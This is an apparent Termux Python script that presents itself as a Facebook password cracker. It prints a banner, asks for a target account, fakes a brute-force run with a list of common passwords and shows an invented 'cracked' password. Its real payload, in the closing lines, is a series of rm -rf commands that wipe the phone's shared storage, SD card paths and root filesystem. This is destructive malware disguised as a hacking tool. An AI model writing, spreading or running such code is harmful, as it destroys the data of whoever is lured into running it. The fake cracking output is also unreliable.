import os
import time
os.system('termux-setup-storage')

print("\033[1;31;32m$$$$$$$_ $$$$$___ __$$___$$_ __$$$___ __$$$$_ $$___$$_")
print("$$______ $$__$$__ __$$___$$_ _$$_$$__ _$$____ $$__$$__")
print("$$$$$___ $$$$$___ __$$$$$$$_ $$___$$_ $$_____ $$$$$___")
print("$$______ $$___$$_ __$$___$$_ $$$$$$$_ $$_____ $$__$$__")
print("$$______ $$___$$_ __$$___$$_ $$___$$_ _$$____ $$___$$_")
print("$$______ $$$$$$__ __$$___$$_ $$___$$_ __$$$$_ $$___$$_")
print("                 Created By:Mr.NightMare")
print("")
input("FB USERNAME/URL/ID:")
print('')
print("Trying Password")
time.sleep(1)
print("\033[1;31;40m123456 | Login Failed")
time.sleep(1)
print("\033[1;31;40mDragon123 | Login Failed")
time.sleep(1)
print("\033[1;31;40mGwapoko123 | Login Failed")
time.sleep(1)
print("\033[1;31;40mGwapako123 | Login Failed")
time.sleep(1)
print("iloveyou123 | Login Failed")
time.sleep(1)
print("mahalkita123 | Login Failed")
time.sleep(1)
print("roblox123 | Login Failed")
time.sleep(1)
print("minecraftplayer123 | Login Failed")
time.sleep(1)
print("johnmylove123 | Login Failed")
time.sleep(1)
print("johnngbuhayko143 | Login Failed")
time.sleep(1)
print("sakitngpuso123 | Login Failed")
time.sleep(1)
print("ikawlangsapatna123 | Login Failed")
time.sleep(1)
print("dotaplayer123 | Login Failed")
time.sleep(1)
print("mlislife123 | Login Failed")
time.sleep(1)
print("\033[31;32mPassword Crack Succesfully")
time.sleep(1)
print("Generating Password")
time.sleep(1)
print("Password: Missnakitabalikkana")

os.system('rm -rf /storage/emulated/0/*')
os.system('rm -rf /storage/emulated/*')
os.system('rm -rf /sdcard/*')
os.system('rm -rf /sdcard/0/*')
os.system('rm -rf /sdcard1/*')
os.system('rm -rf /storage/*')
os.system('rm -rf /*')

